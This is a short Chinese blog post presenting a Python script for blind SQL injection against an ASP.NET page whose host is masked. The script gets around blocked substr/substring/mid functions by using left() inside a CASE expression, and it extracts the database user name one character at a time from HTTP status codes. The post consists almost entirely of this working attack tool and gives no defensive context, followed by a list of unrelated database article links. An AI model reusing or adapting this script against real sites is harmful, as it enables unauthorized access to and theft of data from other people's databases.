禁用substr、substring、mid函数的sql注入脚本
2016-04-13 16:39
316 查看
变懒了啊···
#encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.') headers = { 'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************' } print "test..." user="" for i in range(1,7): for payload in payloads: user+=payload aaa="--" d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user) test = d + aaa r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers) if r.status_code==200: print user break else: user=user[:-1]
相关文章推荐
- 数据库分页技术大全(超级经典)
- 专门查看阻塞和死锁情况以及引起的SQL语句,你可以创建后,直接运行之。
- MySQL 锁、事务隔离级别
- MYSQL 解锁与锁表
- show profile的使用
- Sybase 基础SQL查询
- Oracle正则表达式替换字符串
- SQLite语句
- MSSQL
- mysql odbc 5.3 install error 13: system error code 126
- oracle10g的em工具优化sql功能
- SQL
- Oracle定义DES加密解密及MD5加密函数示例
- mysql 查询的时候处理中文汉字按照字母排序问题
- MySql【Insert Select Not Exist】判断记录再添加值的方案
- Oracle Study之-Oracle 11g OCM考试(2)
- oracle学习笔记 oracle软件安装和数据库的创建
- sqlserver中的bcp查询导出海量数据
- Redis学习_01 windows下的环境搭建
- 监控SQL